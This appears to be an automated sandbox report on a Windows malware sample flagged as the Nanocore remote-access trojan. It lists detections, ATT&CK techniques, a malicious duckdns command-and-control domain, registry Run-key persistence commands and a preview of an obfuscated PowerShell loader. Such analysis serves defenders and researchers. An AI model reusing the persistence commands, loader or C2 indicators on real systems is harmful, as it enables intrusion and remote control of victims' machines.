nHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll

Yara detected Nanocore RAT

Source: Yara match	File source: 5.2.CasPol.exe.244c4629.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229f3105.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.244c0000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229eeadc.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 5.2.CasPol.exe.229e9ca6.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000005.00000002.28417516925.00000000229E7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000005.00000002.28422942050.00000000244C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: CasPol.exe PID: 1072, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	11 Command and Scripting Interpreter	1 DLL Side-Loading	1 DLL Side-Loading	1 Disable or Modify Tools	11 Input Capture	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	1 Ingress Tool Transfer	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	1 Scheduled Task/Job	1 Scheduled Task/Job	1 Access Token Manipulation	1 Obfuscated Files or Information	LSASS Memory	114 System Information Discovery	Remote Desktop Protocol	11 Input Capture	11 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	1 Registry Run Keys / Startup Folder	112 Process Injection	1 Software Packing	Security Account Manager	31 Security Software Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Remote Access Software	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 Scheduled Task/Job	1 DLL Side-Loading	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	1 Registry Run Keys / Startup Folder	11 Masquerading	LSA Secrets	231 Virtualization/Sandbox Evasion	SSH	Keylogging	213 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	231 Virtualization/Sandbox Evasion	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	1 Access Token Manipulation	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	112 Process Injection	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Hidden Files and Directories	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
Certificate#U00b7pdf.exe	32%	ReversingLabs	Win32.Trojan.Generic
Certificate#U00b7pdf.exe	54%	Virustotal		Browse
Certificate#U00b7pdf.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Link
drive.usercontent.google.com	1%	Virustotal	Browse
drive.google.com	0%	Virustotal	Browse
7fxcmft-olcmjfjxdk.duckdns.org	12%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
http://nuget.org/NuGet.exe	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctnca.cer09	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png4	0%	Avira URL Cloud	safe
http://crl.certum.pl/ctsca2021.crl0o	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png	0%	Avira URL Cloud	safe
https://drive.google.com/8	0%	Avira URL Cloud	safe
http://crl.certum.pl/ctnca.crl0k	0%	Avira URL Cloud	safe
http://pesterbdd.com/images/Pester.png4	10%	Virustotal		Browse
http://crl.certum.pl/ctsca2021.crl0o	0%	Virustotal		Browse
http://nuget.org/NuGet.exe	0%	Virustotal		Browse
http://crl.certum.pl/ctnca.crl0k	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Avira URL Cloud	safe
https://drive.google.com/8	1%	Virustotal		Browse
http://pesterbdd.com/images/Pester.png	9%	Virustotal		Browse
https://contoso.com/Icon	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html	0%	Virustotal		Browse
http://nsis.sf.net/NSIS_ErrorError	0%	Avira URL Cloud	safe
http://www.apache.org/licenses/LICENSE-2.0.html4	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester	0%	Avira URL Cloud	safe
https://github.com/Pester/Pester4	0%	Avira URL Cloud	safe
https://contoso.com/License	0%	Virustotal		Browse
http://repository.certum.pl/ctnca.cer09	0%	Virustotal		Browse
http://repository.certum.pl/ctsca2021.cer0	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com05	0%	Avira URL Cloud	safe
https://drive.usercontent.google.com/	1%	Virustotal		Browse
https://github.com/Pester/Pester4	0%	Virustotal		Browse
https://github.com/Pester/Pester	1%	Virustotal		Browse
https://drive.google.com/	0%	Avira URL Cloud	safe
http://subca.ocsp-certum.com02	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctsca2021.cer0	0%	Virustotal		Browse
http://subca.ocsp-certum.com01	0%	Avira URL Cloud	safe
http://nsis.sf.net/NSIS_ErrorError	0%	Virustotal		Browse
https://contoso.com/Icon	0%	Virustotal		Browse
https://contoso.com/	0%	Avira URL Cloud	safe
https://nuget.org/nuget.exe	0%	Avira URL Cloud	safe
http://crl.certum.pl/ctnca2.crl0l	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctnca2.cer09	0%	Avira URL Cloud	safe
http://crl.certum.pl/ctnca2.crl0l	0%	Virustotal		Browse
7fxcmft-olcmjfjxdk.duckdns.org	100%	Avira URL Cloud	malware
https://nuget.org/nuget.exe	0%	Virustotal		Browse
http://www.apache.org/licenses/LICENSE-2.0.html4	0%	Virustotal		Browse
https://drive.google.com/	0%	Virustotal		Browse
7fxcmft-olcmjfjxdk.duckdns.org	12%	Virustotal		Browse
https://contoso.com/	0%	Virustotal		Browse
http://www.quovadis.bm0	0%	Avira URL Cloud	safe
https://ocsp.quovadisoffshore.com0	0%	Avira URL Cloud	safe
http://crl.mics	0%	Avira URL Cloud	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Avira URL Cloud	safe
https://aka.ms/pscore6lB2r	0%	Avira URL Cloud	safe
http://www.certum.pl/CPS0	0%	Avira URL Cloud	safe
http://repository.certum.pl/ctnca2.cer09	0%	Virustotal		Browse
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	Virustotal		Browse
http://www.certum.pl/CPS0	0%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
drive.google.com	142.250.191.110	true	false	0%, Virustotal, Browse	unknown
drive.usercontent.google.com	142.250.191.129	true	false	1%, Virustotal, Browse	unknown
7fxcmft-olcmjfjxdk.duckdns.org	unknown	unknown	true	12%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
	true		unknown
7fxcmft-olcmjfjxdk.duckdns.org	true	12%, Virustotal, Browse Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://pesterbdd.com/images/Pester.png4	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	10%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nuget.org/NuGet.exe	powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctsca2021.crl0o	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctnca.cer09	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.google.com/8	CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca.crl0k	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/License	powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://contoso.com/Icon	powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://drive.usercontent.google.com/	CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html4	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://github.com/Pester/Pester4	powershell.exe, 00000004.00000002.24015082052.0000000004DAA000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctsca2021.cer0	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com05	Certificate#U00b7pdf.exe	false	Avira URL Cloud: safe	unknown
https://drive.google.com/	CasPol.exe, 00000005.00000002.28382435662.000000000519B000.00000004.00000020.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com02	Certificate#U00b7pdf.exe	false	Avira URL Cloud: safe	unknown
http://subca.ocsp-certum.com01	Certificate#U00b7pdf.exe	false	Avira URL Cloud: safe	unknown
https://contoso.com/	powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000004.00000002.24019197601.0000000005CAE000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://crl.certum.pl/ctnca2.crl0l	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://repository.certum.pl/ctnca2.cer09	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.quovadis.bm0	powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ocsp.quovadisoffshore.com0	powershell.exe, 00000004.00000002.24020469340.0000000007620000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000005.00000002.28382435662.00000000051F4000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://crl.mics	powershell.exe, 00000004.00000002.24023428377.0000000008BA5000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://aka.ms/pscore6lB2r	powershell.exe, 00000004.00000002.24015082052.0000000004C41000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.certum.pl/CPS0	Certificate#U00b7pdf.exe	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
142.250.191.129	drive.usercontent.google.com	United States		15169	GOOGLEUS	false
142.250.191.110	drive.google.com	United States		15169	GOOGLEUS	false

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1467968
Start date and time:	2024-07-05 07:22:59 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 16m 53s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301
Run name:	Suspected Instruction Hammering
Number of analysed new started processes analysed:	10
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	Certificate#U00b7pdf.exe
Detection:	MAL
Classification:	mal100.troj.evad.winEXE@13/15@189/2
EGA Information:	Successful, ratio: 75%
HCA Information:	Successful, ratio: 96% Number of executed functions: 269 Number of non-executed functions: 26
Cookbook Comments:	Found application associated with file extension: .exe Sleeps bigger than 100000000ms are automatically reduced to 1000ms

Warnings

Exclude process from analysis (whitelisted): dllhost.exe
Execution Graph export aborted for target powershell.exe, PID 5828 because it is empty
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
01:26:46	API Interceptor	30348211x Sleep call for process: CasPol.exe modified
07:26:14	Task Scheduler	Run new task: DSL Monitor path: "C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe" s>$(Arg0)
07:26:14	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252)
07:26:22	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Startup key %Ec32% -windowstyle minimized $Engrams252=(Get-ItemProperty -Path 'HKCU:\Jgerstuerne\').Curatives;%Ec32% -windowstyle minimized ($Engrams252)

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	poMkNYHDU3.exe	Get hash	malicious	Remcos	Browse	142.250.191.129 142.250.191.110
	SecuriteInfo.com.FileRepMalware.1111.23697.exe	Get hash	malicious	Unknown	Browse	142.250.191.129 142.250.191.110
	lem.exe	Get hash	malicious	Vidar	Browse	142.250.191.129 142.250.191.110
	file.exe	Get hash	malicious	Vidar	Browse	142.250.191.129 142.250.191.110
	file.exe	Get hash	malicious	Babuk, Djvu	Browse	142.250.191.129 142.250.191.110
	5gO02Ijl9V.exe	Get hash	malicious	GuLoader	Browse	142.250.191.129 142.250.191.110
	ooXgr5BYnA.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.191.129 142.250.191.110
	7Bkd5ILk1o.exe	Get hash	malicious	GuLoader, Lokibot	Browse	142.250.191.129 142.250.191.110
	oFNtjcXGVB.exe	Get hash	malicious	FormBook, GuLoader	Browse	142.250.191.129 142.250.191.110
	Co0Wd0QVRU.exe	Get hash	malicious	Remcos, GuLoader	Browse	142.250.191.129 142.250.191.110

Process:	C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe
File Type:	ASCII text, with CRLF line terminators
Category:	modified
Size (bytes):	20
Entropy (8bit):	3.6841837197791887
Encrypted:	false
SSDEEP:	3:QHXMKas:Q3Las
MD5:	B3AC9D09E3A47D5FD00C37E075A70ECB
SHA1:	AD14E6D0E07B00BD10D77A06D68841B20675680B
SHA-256:	7A23C6E7CCD8811ECDF038D3A89D5C7D68ED37324BAE2D4954125D9128FA9432
SHA-512:	09B609EE1061205AA45B3C954EFC6C1A03C8FD6B3011FF88CF2C060E19B1D7FD51EE0CB9D02A39310125F3A66AA0146261BDEE3D804F472034DF711BC942E316
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	1,"fusion","GAC",0..

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	modified
Size (bytes):	8003
Entropy (8bit):	4.840877972214509
Encrypted:	false
SSDEEP:	192:Dxoe5HVsm5emda2Ca6pZlbjvwRjdHPRhHgkjDt4iWN3yBGHVQ9smzdcU6CDQpOFP:J5opbjvwRjdvRCkjh4iUx5Uib4J
MD5:	C7C7584B53C7E1685BD19C0CAEBB4C44
SHA1:	4F9D95010E36559C4F2D15E0E9C20349A65783A6
SHA-256:	F5DBB7A566A3BD3A84DB8FC60784E768CC6753BACD192C6CD71098F1C0B4B01E
SHA-512:	281C50EBE3BAB2836D1C06B7DE27E320F8D43A11956165D40007BBFF3B6D78A3AC6094E6A7AB762F627E308C9A4E40139B8D0A347669C5D32B5AB3AA4EDEA9D7
Malicious:	false
Reputation:	low
Preview:	PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	64
Entropy (8bit):	0.34726597513537405
Encrypted:	false
SSDEEP:	3:Nlll:Nll
MD5:	446DD1CF97EABA21CF14D03AEBC79F27
SHA1:	36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:	A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:	A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:	false
Preview:	@...e...........................................................

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\Kommandosyntaksen.Knk

Download File

Process:	C:\Users\user\Desktop\Certificate#U00b7pdf.exe
File Type:	ASCII text, with very long lines (19791), with no line terminators
Category:	dropped
Size (bytes):	19791
Entropy (8bit):	5.406271986309318
Encrypted:	false
SSDEEP:	384:d1UVuZ5m6xESOxlNqZRBpMMXc3DCUay5NJGUNZv39GifHHoBTCdS+WTe11Z7:QVurNFOTNq7BCWUakNJLR39GifHHc86O
MD5:	96E01A7F78D8E8CCCDC83224CEAEB4B9
SHA1:	0DDC2F6A375C495797450BD9335598A9B5EE0C5E
SHA-256:	BF8DCC7B82D62ADD6B0D32997E6134C1BB1709F7888746E996E3704573AD8791
SHA-512:	559975800C90E8A2A709DD48F83FB9761009492571DCF98D2A4F300F75CA9304B359AD39B4356F6594ED62DD862413701AD9FD43970338CB37DDCD1F48AB9EE4
Malicious:	true
Preview:	<#Fordaervet Kauch Ticklenburg Synonymized Nippers Hysse #>$Boarspear = """Pe;ReF SuSunSkc OtPri Po Cn D AeBCarTju Cd Kg coAsmSemDee M0Wa4 K B{St Do Tr U KopTeaFor oaatmNo(Ov[HaSPot Fr UiSlnSpgVo] H`$PiS Ca UlSteAns FwDio Om Fe Un p)Re; D De d A D`$ RT Fh viChoOpt Ch Wr Ti Ex T No= R SNNoeInwUd-OcOReb UjFoe ScGotOc MebMiyLdtPreIn[Fo] P Sc(Ib`$ CSSpa ll UeEns MwSeoGdm BeDynAn.InL De An BgJot Ch P Fo/Co A2Su) I; D Ma Sc F FlFFyoSlrMe(Sc`$ PA DnPitPai FlMuaTrbAso PrSks K=Pa0Ra;Bi B`$BaA Nn GtPoi LlspaRabHvo SrBls V Pr- Ml AtBo Fa`$PaSDia SlOpeBaslew So Sm Ze MnSl.LyLVaeDrn Yg Ft Dh T;Il Lf`$ PA pnHyt Ci NlEkaTabFioStrSks C+ I=Li2An)Af{Ku D Sk E St Ku Pe Fo Fa`$ekT BhSei SogutBehinr uiVaxUn[Ta`$BiAYondat SiRelIma AbGuo Nr Ws t/ T2 P] F No= O Pa[uncGloInn BvPye SrUntSe]Im: U:CaTTho PBSyyantAueUn(Fj`$ SS Ia Tl SeMes Fw Bo bmfoeBonSu.KlS au Kb Ss MtLor TiSpnAng Z(St`$PhAUnnsatBui HlFoaMybMioSorTus D, I Er2un) G,In au1Mu6Ca)Mi;En.Re.Ti`$ReT Fh SiRooFit Sh PrSoi DxSv[ar`$GaACinTrtEdi

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\japanese.txt

Download File

Process:	C:\Users\user\Desktop\Certificate#U00b7pdf.exe
File Type:	Unicode text, UTF-8 text
Category:	dropped
Size (bytes):	26423
Entropy (8bit):	3.554983747162495
Encrypted:	false
SSDEEP:	768:OwUkxkf27FkrH9tW/JgODfFFuHgFFqfw8QCBdqLMCl:Ogxkf27FkrdtW/JgOD9FuHgFFqfwLidW
MD5:	C71FCA9FD3FE9F85514CB38A58859DE2
SHA1:	A4EC1DA6C11A8C251195C7AD90817DDA6FE64488
SHA-256:	2EED0AEF492291E061633D7AD8117F1A2B03EB80A29D0E4E3117AC2528D05FFD
SHA-512:	3FAF87F7E48EB6635F7D7B18A34E7DACBC2C43A1CF6AA9C96015B2A3549710B8B7A0961E5D2E32D7E369099DB89A874C4D761A8384FB558744C7F47CA8CB0772
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Skamflelsens\fameless\Imitability\Ilddaabens\ku.txt

Download File

Process:	C:\Users\user\Desktop\Certificate#U00b7pdf.exe
File Type:	Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	5841
Entropy (8bit):	5.148203465705585
Encrypted:	false
SSDEEP:	96:iPHrOVp0Wqx9Zgwx+tBttSTULz9bkfHas8SwQfBMoWURypM4L4l28Wgk+drzNadK:iP6Vpu1MZtSTWbkvasTwQjZRyps+g9kK
MD5:	6E9A3E86335C08C15350BA91DF969269
SHA1:	3C5FDC93B569DB37B76009F51483E7BF55A7919B
SHA-256:	A00B21A87A58ADEFF29EA379160B6AE72DF5EC380F6E4C6A1BC352B6581FB4C4
SHA-512:	C9919CA7FF62B673A22447029D77630C44D71847E0B4D2D8C572FC6E0FA51CC03473BE46B87C0DCAFE0194CB12119E8706286060622E42892702EC3C6239AD0F
Malicious:	false
Preview:	.;!@Lang2@!UTF-8!..; 4.37 : Rizoy. Xerz...;..;..;..;..;..;..;..;..;..;..0..7-Zip..Kurdish..Kurd...401..Temam..Betal........&Er...&Na..Bi&gire..Al.kar.....Bi&dom.ne..440..&Ji Bo Hem.y. Er...Ji &Bo Hem.y. Na..Raweste..D.sa Destp.ke..L%i Pi.t..Li &P....&Rawest.ne..Rawestiya -..Ma bila betal bibe?..500..&Dosya..&Bipergal.ne..&N..an Bide..Bi&jare..&Am.r..A&l.kar...540..&Veke..&Di Panel. De Veke..Di &Pacey. De Veke..&N..an Bide..&Sererast bike..&Navek. N. Bid...&Ji Ber Bigire..B&ar Bike..J. B&ibe..Par.e Bi&ke.....Bike &Yek.....&Taybet...Da&xuyan...checksum heseb bike....Pe&ldankeke N...Do&siyeke N...De&rkeve..600..&Hem.y. hilbij.re..He&m. hilijartin. rake..Be&revaj. w. hilbij.re..&Hilbij.re.....Hilbijarti&n. Rake.....V. curey. hilbij.re..Hilbijartina cure rake..700..&Daw.r.n Mezin..D&aw.r.n Bi..k..&L.ste..&H.ragah...730..B. Dor..xuyakirina sade..&2 Panelan veke..Da&rik. am.ran..Peldanka Kok Veke..Astek. Berjor..D.roka Peldank

C:\Users\user\AppData\Local\Skamflelsens\fameless\Pregenerous224\Ateistiskes.Non

Download File

Process:	C:\Users\user\Desktop\Certificate#U00b7pdf.exe
File Type:	data
Category:	dropped
Size (bytes):	281497
Entropy (8bit):	7.457168665740074
Encrypted:	false
SSDEEP:	6144:jCPiAm8M/GCrDDnkwz3/5Nl2xo8z1efe79:ZAC/GCrUQLluW279
MD5:	EA9008DCEE3A6E78B4855F2AE9EC202D
SHA1:	06BBB64D3AFB291AFBCB56CF4E9D7BF41CD3ADA6
SHA-256:	8BB95F866A2D1DD926ADB4462D53841EBC3D9B400E5A84D26413BF0E424A5790
SHA-512:	E5216E669A4DF3877ACF0471EBF2EA7B8C5D4C3D45238F78A5A366293EF809D15B5D9B52483CFFC244C79E3AB4842A93F94CAE610B30E8C68B4686417C538956
Malicious:	false
Preview:	.............=............&......"..........^..............w.....q.............LL.......................................44444...............................................................0...............***............mm........GG.....rr..&...........bbb...xx......\............pp...................................................LL...s..Z..........X................A......G.f.88.l.............p.....}......F...........MMM........++............5......o..LL.111.................\|.......;;........HHH................<<<<...tt....@...................o..MMMMMM..""....................QQ..................................$.....J................;........R......,..__.........44..].....d...uu...........VVVVVVVV.............KK..q..................mmm.u......e..........~~.........ii...........w.Y...tttttt..\\\\...............................................D..<......y.................................xxx.....//.................N.cc..........#.................................WW..=........).KKK........[[

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_15gmocky.ptu.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4uav5rm1.xc2.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
